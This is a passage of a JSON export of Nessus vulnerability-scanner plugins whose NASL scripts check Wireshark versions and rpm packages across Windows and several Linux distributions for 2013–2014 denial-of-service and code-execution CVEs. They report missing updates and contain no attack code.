"2020-04-02T00:00:00", "id": "WIRESHARK_1_10_3.NASL", "href": "https://www.tenable.com/plugins/nessus/70762", "published": "2013-11-05T00:00:00", "title": "Wireshark 1.10.x < 1.10.3 Multiple DoS Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70762);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\n \"CVE-2013-6336\",\n \"CVE-2013-6337\",\n \"CVE-2013-6338\",\n \"CVE-2013-6339\",\n \"CVE-2013-6340\"\n );\n script_bugtraq_id(63500, 63501, 63502, 63503, 63504);\n\n script_name(english:\"Wireshark 1.10.x < 1.10.3 Multiple DoS Vulnerabilities\");\n script_summary(english:\"Does a version check\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains an application that is affected by\nmultiple denial of service vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Wireshark 1.10.x is earlier than 1.10.3. It\nis, therefore, affected by denial of service vulnerabilities in the\nfollowing dissectors :\n\n - IEEE 802.15.4 (Bug #9139)\n - NBAP (Bug #9168)\n - SIP (Bug #9228)\n - ActiveMQ OpenWire (Bug #9248)\n - TCP (Bug #9263)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-61.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-62.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-63.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-64.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/security/wnpa-sec-2013-65.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.10.3.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Wireshark version 1.10.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wireshark:wireshark\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"wireshark_installed.nasl\");\n script_require_keys(\"SMB/Wireshark/Installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each install.\ninstalls = get_kb_list_or_exit(\"SMB/Wireshark/*\");\n\ninfo = '';\ninfo2 = '';\n\nforeach install(keys(installs))\n{\n if (\"/Installed\" >< install) continue;\n\n version = install - \"SMB/Wireshark/\";\n\n if (version =~ \"^1\\.10\\.[0-2]($|[^0-9])\")\n info +=\n '\\n Path : ' + installs[install] +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.10.3\\n';\n else\n info2 += 'Version ' + version + ', under ' + installs[install] + ' ';\n}\n\n# Remove trailing space on info2\nif (strlen(info2) > 1)\n info2 = substr(info2, 0, strlen(info2) -2);\n\n# Report if any were found to be vulnerable\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (max_index(split(info)) > 4) s = \"s of Wireshark are\";\n else s = \" of Wireshark is\";\n\n report =\n '\\n' + 'The following vulnerable instance' + s + ' installed :' +\n '\\n' +\n info;\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nif (info2) exit(0, \"The following installed instance(s) of Wireshark are not affected : \" + info2 + \".\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T02:44:58", "bulletinFamily": "scanner", "description": "Wireshark has been updated to version 1.8.11 to fix bugs and security\nissues.", "modified": "2020-04-02T00:00:00", "id": "SUSE_11_WIRESHARK-131106.NASL", "href": "https://www.tenable.com/plugins/nessus/71138", "published": "2013-11-29T00:00:00", "title": "SuSE 11.2 / 11.3 Security Update : wireshark (SAT Patch Numbers 8503 / 8504)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(71138);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2014/03/15 02:06:33 $\");\n\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\", \"CVE-2013-6340\");\n\n script_name(english:\"SuSE 11.2 / 11.3 Security Update : wireshark (SAT Patch Numbers 8503 / 8504)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Wireshark has been updated to version 1.8.11 to fix bugs and security\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=839607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=848738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-6336.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-6337.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-6338.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-6339.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-6340.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 8503 / 8504 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"wireshark-1.8.11-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"wireshark-1.8.11-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"wireshark-1.8.11-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"wireshark-1.8.11-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"wireshark-1.8.11-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"wireshark-1.8.11-0.2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-17T23:22:30", "bulletinFamily": "scanner", "description": "fix subpackage requires Harden dumpcap capabilities\n\n - Ver. 1.10.3\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2013-11-11T00:00:00", "id": "FEDORA_2013-20985.NASL", "href": "https://www.tenable.com/plugins/nessus/70834", "published": "2013-11-11T00:00:00", "title": "Fedora 19 : wireshark-1.10.3-3.fc19 (2013-20985)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-20985.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70834);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\", \"CVE-2013-6340\");\n script_bugtraq_id(63500, 63501, 63502, 63503, 63504);\n script_xref(name:\"FEDORA\", value:\"2013-20985\");\n\n script_name(english:\"Fedora 19 : wireshark-1.10.3-3.fc19 (2013-20985)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"fix subpackage requires Harden dumpcap capabilities\n\n - Ver. 1.10.3\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026534\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026538\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026539\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026540\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1026541\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-November/121307.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7871701f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"wireshark-1.10.3-3.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T06:47:14", "bulletinFamily": "scanner", "description": "Two flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash\nor, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2014-2281 , CVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2013-6336 ,\nCVE-2013-6337 , CVE-2013-6338 , CVE-2013-6339 , CVE-2013-6340 ,\nCVE-2014-2283 , CVE-2013-7112 , CVE-2013-7114)", "modified": "2020-04-02T00:00:00", "id": "ALA_ALAS-2014-330.NASL", "href": "https://www.tenable.com/plugins/nessus/78273", "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : wireshark (ALAS-2014-330)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-330.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78273);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/09/27 11:15:33\");\n\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\", \"CVE-2013-6340\", \"CVE-2013-7112\", \"CVE-2013-7114\", \"CVE-2014-2281\", \"CVE-2014-2283\", \"CVE-2014-2299\");\n script_xref(name:\"ALAS\", value:\"2014-330\");\n script_xref(name:\"RHSA\", value:\"2014:0342\");\n\n script_name(english:\"Amazon Linux AMI : wireshark (ALAS-2014-330)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash\nor, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2014-2281 , CVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2013-6336 ,\nCVE-2013-6337 , CVE-2013-6338 , CVE-2013-6339 , CVE-2013-6340 ,\nCVE-2014-2283 , CVE-2013-7112 , CVE-2013-7114)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-330.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update wireshark' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark wiretap/mpeg.c Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:wireshark-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"wireshark-1.8.10-7.13.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"wireshark-debuginfo-1.8.10-7.13.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"wireshark-devel-1.8.10-7.13.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-debuginfo / wireshark-devel\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T02:01:56", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2014:0342 :\n\nUpdated wireshark packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nWireshark is a network protocol analyzer. It is used to capture and\nbrowse the traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash\nor, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2014-2281, CVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2013-6336,\nCVE-2013-6337, CVE-2013-6338, CVE-2013-6339, CVE-2013-6340,\nCVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. All running\ninstances of Wireshark must be restarted for the update to take\neffect.", "modified": "2020-04-02T00:00:00", "id": "ORACLELINUX_ELSA-2014-0342.NASL", "href": "https://www.tenable.com/plugins/nessus/73280", "published": "2014-04-01T00:00:00", "title": "Oracle Linux 6 : wireshark (ELSA-2014-0342)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:0342 and \n# Oracle Linux Security Advisory ELSA-2014-0342 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73280);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/09/30 10:58:19\");\n\n script_cve_id(\"CVE-2013-6336\", \"CVE-2013-6337\", \"CVE-2013-6338\", \"CVE-2013-6339\", \"CVE-2013-6340\", \"CVE-2013-7112\", \"CVE-2013-7114\", \"CVE-2014-2281\", \"CVE-2014-2283\", \"CVE-2014-2299\");\n script_bugtraq_id(63500, 63501, 63502, 63503, 63504, 64411, 64412, 66066, 66068, 66072);\n script_xref(name:\"RHSA\", value:\"2014:0342\");\n\n script_name(english:\"Oracle Linux 6 : wireshark (ELSA-2014-0342)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2014:0342 :\n\nUpdated wireshark packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nWireshark is a network protocol analyzer. It is used to capture and\nbrowse the traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash\nor, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2014-2281, CVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2013-6336,\nCVE-2013-6337, CVE-2013-6338, CVE-2013-6339, CVE-2013-6340,\nCVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. All running\ninstances of Wireshark must be restarted for the update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-March/004055.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark wiretap/mpeg.c Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:wireshark-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"wireshark-1.8.10-7.0.1.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"wireshark-devel-1.8.10-7.0.1.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"wireshark-gnome-1.8.10-7.0.1.el6_5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-devel / wireshark-gnome\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T02:13:18", "bulletinFamily": "scanner", "description": "Updated wireshark packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nWireshark is a network protocol analyzer. It is used to capture and\nbrowse the traffic running on a computer network.\n\nTwo flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash\nor, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2014-2281, CVE-2014-2299)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2013-6336,\nCVE-2013-6337, CVE-2013-6338, CVE-2013-6339, CVE-2013-6340,\nCVE-2014-2283, CVE-2013-7112, CVE-2013-7114)\n\nAll Wireshark users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. All running\ninstances of Wireshark must be restarted for the update to take\neffect.", "modified": "2020-04-02T00:00:00", "id": "REDHAT-RHSA-2014-0342.NASL", "href": "https://www.tenable.com/plugins/nessus/73282", "published": "2014-04-01T00:00:00", "title": "RHEL 6 : wireshark 